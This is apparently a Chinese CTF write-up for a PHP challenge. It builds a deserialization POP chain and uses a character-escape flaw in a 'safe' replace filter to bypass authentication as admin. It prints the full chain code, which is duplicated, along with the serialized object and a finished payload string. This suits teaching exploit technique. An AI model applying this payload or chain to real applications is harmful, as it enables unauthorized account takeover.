©2020-2024 ioDraw All rights reserved
<>知识点
* 反序列化pop链
* 反序列化字符逃逸
<>解题过程
www.zip 备份文件获取源码
审计代码构造pop链
<?php Class UpdateHelper{ public $id; public $newinfo; public $sql; } class
User { public $id; public $age; public $nickname; public function __toString() {
$this->nickname->update($this->age); return "0-0"; } } class dbCtrl { public
$hostname="127.0.0.1"; public $dbuser="root"; public $dbpass="root"; public
$database="test"; public $name; public $password; public $mysqli; public $token;
} class Info{ public $age; public $nickname; public $CtrlCase; public function
__call($name,$argument){ echo $this->CtrlCase->login($argument[0]); } } $a = new
UpdateHelper(); $b = new User(); $c = new Info(); $d = new dbCtrl(); $d->name =
"admin"; $d->password = "1"; $c->CtrlCase = $d; $b->nickname = $c; $b->age =
'select id, "c4ca4238a0b923820dcc509a6f75849b" from user where username=?'; $a->
sql = $b; $s = serialize($a); $obj_dream = new Info(); $obj_dream->age = "1";
$obj_dream->nickname = "11"; $obj_dream->CtrlCase = $a; echo serialize(
$obj_dream); <?php Class UpdateHelper{ public $id; public $newinfo; public $sql;
} class User { public $id; public $age; public $nickname; public function
__toString() { $this->nickname->update($this->age); return "0-0"; } } class
dbCtrl { public $hostname="127.0.0.1"; public $dbuser="root"; public $dbpass=
"root"; public $database="test"; public $name; public $password; public $mysqli;
public $token; } class Info{ public $age; public $nickname; public $CtrlCase;
public function __call($name,$argument){ echo $this->CtrlCase->login($argument[0
]); } } $a = new UpdateHelper(); $b = new User(); $c = new Info(); $d = new
dbCtrl(); $d->name = "admin"; $d->password = "1"; $c->CtrlCase = $d; $b->
nickname = $c; $b->age = 'select id, "c4ca4238a0b923820dcc509a6f75849b" from
user where username=?'; $a->sql = $b; $s = serialize($a); $obj_dream = new Info(
); $obj_dream->age = "1"; $obj_dream->nickname = "11"; $obj_dream->CtrlCase = $a
; echo serialize($obj_dream);
O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:2:"11";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select
id, "c4ca4238a0b923820dcc509a6f75849b" from user where
username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}
漏洞处只能传递两个参数
但是有safe这个替换函数
存在反序列化字符逃逸漏洞,可以逃逸任意数量的字符
用字符逃逸传递三个参数进去
需要逃逸的字符串为
";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select
id, "c4ca4238a0b923820dcc509a6f75849b" from user where
username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}
总共466个字符
由safe函数可知 *替换成hacker多5个字符 union替换成hacker多一个字符
93个*加1个union即可逃逸466个字符
payload为
age=1&nickname=*********************************************************************************************union";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select
id, "c4ca4238a0b923820dcc509a6f75849b" from user where
username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}
注入后,session[token]为admin,再以admin为账号,任意密码即可登录,拿到flag